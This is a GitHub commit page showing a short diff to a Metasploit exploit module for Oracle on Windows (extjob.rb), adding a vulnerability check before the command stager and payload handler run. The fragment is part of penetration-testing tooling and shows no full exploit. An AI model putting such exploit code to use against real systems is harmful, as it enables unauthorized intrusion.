We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
2 parents c786852 + f237c56 commit 3a00db3Copy full SHA for 3a00db3
modules/exploits/windows/oracle/extjob.rb
@@ -53,9 +53,13 @@ def initialize(info = {})
53
end
54
55
def exploit
56
- print_status("Exploiting through \\\\#{datastore['RHOST']}\\orcljsex#{datastore['SID']} named pipe...")
57
- execute_cmdstager({:linemax => 1500})
58
- handler
+ if check == Exploit::CheckCode::Vulnerable
+ print_status("Exploiting through \\\\#{datastore['RHOST']}\\orcljsex#{datastore['SID']} named pipe...")
+ execute_cmdstager({:linemax => 1500})
59
+ handler
60
+ else
61
+ print_error "#{rhost} does not appear to be vulnerable!"
62
+ end
63
64
65
def execute_command(cmd, opts)
0 commit comments